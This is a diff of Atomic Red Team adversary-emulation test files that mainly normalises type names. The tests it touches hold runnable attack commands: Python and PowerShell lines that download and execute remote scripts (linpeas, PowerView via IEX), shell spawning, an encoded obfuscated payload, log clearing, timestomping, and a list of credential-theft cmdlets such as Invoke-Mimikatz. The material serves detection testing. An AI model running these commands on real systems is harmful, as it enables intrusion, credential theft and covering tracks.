description: The "Command" parameter variation to use
type: String
type: string
default: C
encoded_arguments_param_variation:
description: The "EncodedArguments" parameter variation to use
type: String
type: string
default: EA
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
@@ -327,11 +327,11 @@ atomic_tests:
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: String
type: string
default: Hyphen
encoded_command_param_variation:
description: The "EncodedCommand" parameter variation to use
type: String
type: string
default: E
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
@@ -353,15 +353,15 @@ atomic_tests:
input_arguments:
encoded_command_param_variation:
description: The "EncodedCommand" parameter variation to use
type: String
type: string
default: E
command_line_switch_type:
description: The type of supported command-line switch to use
type: String
type: string
default: Hyphen
encoded_arguments_param_variation:
description: The "EncodedArguments" parameter variation to use
type: String
type: string
default: EncodedArguments
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
@@ -384,7 +384,7 @@ atomic_tests:
input_arguments:
obfuscated_code:
description: 'Defaults to: Invoke-Expression with a "Write-Host" line.'
type: String
type: string
default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
executor:
command: |
@@ -398,8 +398,8 @@ atomic_tests:
- windows
input_arguments:
Malicious_cmdlets:
description: Known Malicious Cmdlets
type: String
description: Known Malicious Cmdlets
type: string
default: |
"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"
executor:
@@ -440,4 +440,3 @@ atomic_tests:
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
name: powershell
atomics/T1059.003/T1059.003.yaml
+10 -10
View File
@@ -10,11 +10,11 @@ atomic_tests:
input_arguments:
command_to_execute:
description: Command to execute within script.
type: String
type: string
default: dir
script_path:
description: Script path.
type: Path
type: path
default: $env:TEMP\T1059.003_script.bat
dependency_executor_name: powershell
dependencies:
@@ -40,11 +40,11 @@ atomic_tests:
input_arguments:
file_contents_path:
description: Path to the file that the command prompt will drop.
type: Path
type: path
default: '%TEMP%\test.bin'
message:
description: Message that will be written to disk and then displayed.
type: String
type: string
default: 'Hello from the Windows Command Prompt!'
executor:
command: |
@@ -61,11 +61,11 @@ atomic_tests:
input_arguments:
output_file:
description: File to output to
type: String
type: string
default: hello.txt
input_message:
description: Message to write to file
type: String
type: string
default: Hello, from CMD!
executor:
command: |
@@ -82,11 +82,11 @@ atomic_tests:
input_arguments:
file_to_print:
description: File to be opened/printed by Wordpad.
type: String
type: string
default: $env:temp\T1059_003note.txt
max_to_print:
description: The maximum number of Wordpad windows the test will open/print.
type: String
type: string
default: 75
dependency_executor_name: powershell
dependencies:
@@ -113,7 +113,7 @@ atomic_tests:
input_arguments:
input_file:
description: CMD file that is read by Command Prompt and execute, which launches calc.exe
type: Path
type: path
default: PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd
dependency_executor_name: powershell
dependencies:
@@ -128,4 +128,4 @@ atomic_tests:
command: |
cmd /r cmd<#{input_file}
name: command_prompt
elevation_required: false
elevation_required: false
atomics/T1059.004/T1059.004.yaml
+7 -7
View File
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
script_path:
description: Script path
type: Path
type: path
default: /tmp/art.sh
executor:
command: |
@@ -43,15 +43,15 @@ atomic_tests:
description: |
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
supported_platforms:
- linux
- linux
input_arguments:
autosuid:
description: Path to the autosuid shell script
type: Path
type: path
default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
autosuid_url:
description: Path to download autosuid shell script
type: Url
type: url
default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
dependency_executor_name: bash
dependencies:
@@ -73,15 +73,15 @@ atomic_tests:
description: |
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
supported_platforms:
- linux
- linux
input_arguments:
linenum:
description: Path to the LinEnum shell script
type: Path
type: path
default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
linenum_url:
description: Path to download LinEnum shell script
type: Url
type: url
default: https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh
dependency_executor_name: bash
dependencies:
atomics/T1059.005/T1059.005.yaml
+3 -3
View File
@@ -5,14 +5,14 @@ atomic_tests:
auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9
description: |-
Visual Basic execution test, execute vbscript via PowerShell.
When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
supported_platforms:
- windows
input_arguments:
vbscript:
description: Path to sample script
type: String
type: string
default: PathToAtomicsFolder\T1059.005\src\sys_info.vbs
dependency_executor_name: powershell
dependencies:
@@ -70,7 +70,7 @@ atomic_tests:
input_arguments:
ms_product:
description: Maldoc application Word
type: String
type: string
default: Word
dependency_executor_name: powershell
dependencies:
atomics/T1059.006/T1059.006.yaml
+169 -169
View File
@@ -1,172 +1,172 @@
attack_technique: T1059.006
display_name: 'Command and Scripting Interpreter: Python'
atomic_tests:
- name: Execute shell script via python's command mode arguement
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
supported_platforms:
- linux
input_arguments:
script_url:
description: Shell script public URL
type: String
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Name of shell script downloaded from the script_url
type: String
default: T1059.006-payload
executor:
description: Linux shell
type: String
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.
type: String
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
dependency_executor_name: sh
dependencies:
- description: Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
name: sh
cleanup_command: |
rm #{payload_file_name}
- name: 'Execute Python via scripts (Linux)'
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
description: Create Python file (.py) that downloads and executes shell script via executor arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Python script name
type: Path
default: T1059.006.py
script_url:
description: Shell script public URL
type: String
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: String
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: String
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
type: String
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
dependency_executor_name: sh
dependencies:
- description: |
Requires Python
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}
name: sh
cleanup_command: |
rm #{python_script_name} #{payload_file_name}
- name: 'Execute Python via Python executables (Linux)'
auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
description: |
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Name of Python script name
type: Path
default: T1059.006.py
script_url:
description: URL hosting external malicious payload
type: String
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: String
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: String
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
type: String
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
python_binary_name:
description: Name of Python file to be compiled
type: Path
default: T1059.006.pyc
dependency_executor_name: sh
dependencies:
- description: |
Requires Python
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}
name: sh
cleanup_command: |
rm #{python_binary_name} #{python_script_name} #{payload_file_name}
- name: 'Python pty module and spawn function used to spawn sh or bash'
auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
description: |
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
supported_platforms:
- linux
dependencies:
- description: |
Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
atomic_tests:
- name: Execute shell script via python's command mode arguement
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
supported_platforms:
- linux
input_arguments:
script_url:
description: Shell script public URL
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Name of shell script downloaded from the script_url
type: string
default: T1059.006-payload
executor:
command: |-
which_python=$(which python || which python3 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: bash
description: Linux shell
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.
type: string
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
dependency_executor_name: sh
dependencies:
- description: Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
name: sh
cleanup_command: |
rm #{payload_file_name}
- name: 'Execute Python via scripts (Linux)'
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
description: Create Python file (.py) that downloads and executes shell script via executor arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Python script name
type: path
default: T1059.006.py
script_url:
description: Shell script public URL
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: string
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
type: string
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
dependency_executor_name: sh
dependencies:
- description: |
Requires Python
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}
name: sh
cleanup_command: |
rm #{python_script_name} #{payload_file_name}
- name: 'Execute Python via Python executables (Linux)'
auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
description: |
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Name of Python script name
type: path
default: T1059.006.py
script_url:
description: URL hosting external malicious payload
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: string
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
type: string
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
python_binary_name:
description: Name of Python file to be compiled
type: path
default: T1059.006.pyc
dependency_executor_name: sh
dependencies:
- description: |
Requires Python
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}
name: sh
cleanup_command: |
rm #{python_binary_name} #{python_script_name} #{payload_file_name}
- name: 'Python pty module and spawn function used to spawn sh or bash'
auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
description: |
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
supported_platforms:
- linux
dependencies:
- description: |
Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |-
which_python=$(which python || which python3 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: bash
atomics/T1059.007/T1059.007.yaml
+41 -41
View File
@@ -1,44 +1,44 @@
attack_technique: T1059.007
display_name: "Command and Scripting Interpreter: JavaScript"
atomic_tests:
- name: JScript execution to gather local computer information via cscript
auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035
description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} "
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'"
cleanup_command: Remove-Item $env:TEMP\T1059.007.out.txt -ErrorAction Ignore
name: command_prompt
- name: JScript execution to gather local computer information via wscript
auto_generated_guid: 0709945e-4fec-4c49-9faf-c3c292a74484
description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} "
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: "wscript #{jscript}"
name: command_prompt
- name: JScript execution to gather local computer information via cscript
auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035
description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} "
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'"
cleanup_command: Remove-Item $env:TEMP\T1059.007.out.txt -ErrorAction Ignore
name: command_prompt
- name: JScript execution to gather local computer information via wscript
auto_generated_guid: 0709945e-4fec-4c49-9faf-c3c292a74484
description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} "
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: "wscript #{jscript}"
name: command_prompt
atomics/T1069.002/T1069.002.yaml
+9 -9
View File
@@ -25,7 +25,7 @@ atomic_tests:
input_arguments:
user:
description: User to identify what groups a user is a member of
type: String
type: string
default: administrator
executor:
command: |
@@ -76,10 +76,10 @@ atomic_tests:
input_arguments:
computer_name:
description: hostname of the computer to analyze
type: Path
type: path
default: $env:COMPUTERNAME
executor:
command: |
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
name: powershell
@@ -88,7 +88,7 @@ atomic_tests:
description: |
When successful, accounts that do not require kerberos pre-auth will be returned
supported_platforms:
- windows
- windows
dependency_executor_name: powershell
dependencies:
- description: |
@@ -110,7 +110,7 @@ atomic_tests:
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
- name: Adfind - Query Active Directory Groups
auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
description: |
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -118,7 +118,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -164,7 +164,7 @@ atomic_tests:
When successful, accounts that do not require kerberos pre-auth will be returned.
Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
supported_platforms:
- windows
- windows
dependency_executor_name: powershell
dependencies:
- description: |
@@ -194,7 +194,7 @@ atomic_tests:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
name: powershell
name: powershell
- name: Get-DomainGroup with PowerView
auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
description: |
@@ -205,4 +205,4 @@ atomic_tests:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
name: powershell
name: powershell
atomics/T1070.001/T1070.001.yaml
+1 -1
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
log_name:
description: Windows Log Name, ex System
type: String
type: string
default: System
executor:
command: |
atomics/T1070.002/T1070.002.yaml
+3 -3
View File
@@ -23,7 +23,7 @@ atomic_tests:
input_arguments:
username:
description: Username of mail spool
type: String
type: string
default: root
executor:
command: |
@@ -38,9 +38,9 @@ atomic_tests:
input_arguments:
log_path:
description: Path of specified log
type: Path
type: path
default: /var/log/secure
executor:
command: |
echo 0> #{log_path}
name: bash
name: bash
atomics/T1070.004/T1070.004.yaml
+10 -9
View File
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
type: path
default: /tmp/victim-files/a
executor:
command: |
@@ -27,7 +27,7 @@ atomic_tests:
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
type: path
default: /tmp/victim-files
executor:
command: |
@@ -42,7 +42,7 @@ atomic_tests:
input_arguments:
file_to_shred:
description: Path of file to shred
type: Path
type: path
default: /tmp/victim-shred.txt
executor:
command: |
@@ -57,8 +57,9 @@ atomic_tests:
- windows
input_arguments:
file_to_delete:
description: File to delete. Run the prereq command to create it if it does not exist.
type: String
description: File to delete. Run the prereq command to create it if it does
not exist.
type: string
default: '%temp%\deleteme_T1551.004'
dependency_executor_name: command_prompt
dependencies:
@@ -82,7 +83,7 @@ atomic_tests:
input_arguments:
folder_to_delete:
description: Folder to delete. Run the prereq command to create it if it does not exist.
type: String
type: string
default: '%temp%\deleteme_T1551.004'
dependency_executor_name: command_prompt
dependencies:
@@ -105,7 +106,7 @@ atomic_tests:
input_arguments:
file_to_delete:
description: File to delete. Run the prereq command to create it if it does not exist.
type: String
type: string
default: $env:TEMP\deleteme_T1551.004
dependency_executor_name: powershell
dependencies:
@@ -128,7 +129,7 @@ atomic_tests:
input_arguments:
folder_to_delete:
description: Folder to delete. Run the prereq command to create it if it does not exist.
type: String
type: string
default: $env:TEMP\deleteme_folder_T1551.004
dependency_executor_name: powershell
dependencies:
@@ -177,7 +178,7 @@ atomic_tests:
input_arguments:
teamviewer_log_file:
description: Teamviewer log file to create and delete.
type: String
type: string
default: $env:TEMP\TeamViewer_54.log
executor:
command: |
atomics/T1070.005/T1070.005.yaml
+8 -8
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
share_name:
description: Share to add.
type: String
type: string
default: '\\test\share'
executor:
command: |
@@ -26,7 +26,7 @@ atomic_tests:
input_arguments:
share_name:
description: Share to remove.
type: String
type: string
default: '\\test\share'
executor:
command: |
@@ -41,7 +41,7 @@ atomic_tests:
input_arguments:
share_name:
description: Share to remove.
type: String
type: string
default: '\\test\share'
executor:
command: |
@@ -60,13 +60,13 @@ atomic_tests:
- windows
executor:
command: |
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f
name: command_prompt
elevation_required: true
elevation_required: true
- name: Remove Administrative Shares
auto_generated_guid: 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62
description: |
atomics/T1070.006/T1070.006.yaml
+12 -12
View File
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
type: path
default: /opt/filename
executor:
command: |
@@ -27,7 +27,7 @@ atomic_tests:
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
type: path
default: /opt/filename
executor:
command: |
@@ -46,7 +46,7 @@ atomic_tests:
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
type: path
default: /opt/filename
executor:
command: |
@@ -68,11 +68,11 @@ atomic_tests:
input_arguments:
target_file_path:
description: Path of file to modify timestamps of
type: Path
type: path
default: /opt/filename
reference_file_path:
description: Path of reference file to read timestamps from
type: Path
type: path
default: /bin/sh
executor:
command: |
@@ -88,11 +88,11 @@ atomic_tests:
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: String
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change creation timestamp
type: Path
type: path
default: $env:TEMP\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
@@ -117,11 +117,11 @@ atomic_tests:
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: String
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change modified timestamp
type: Path
type: path
default: $env:TEMP\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
@@ -146,11 +146,11 @@ atomic_tests:
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: String
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change last access timestamp
type: Path
type: path
default: $env:TEMP\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
@@ -178,7 +178,7 @@ atomic_tests:
input_arguments:
file_path:
description: File path for timestomp payload
type: String
type: string
default: $env:appdata\Microsoft
dependency_executor_name: powershell
dependencies:
atomics/T1071.001/T1071.001.yaml
+16 -16
View File
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
domain:
description: Default domain to simulate against
type: String
type: string
default: www.google.com
executor:
command: |
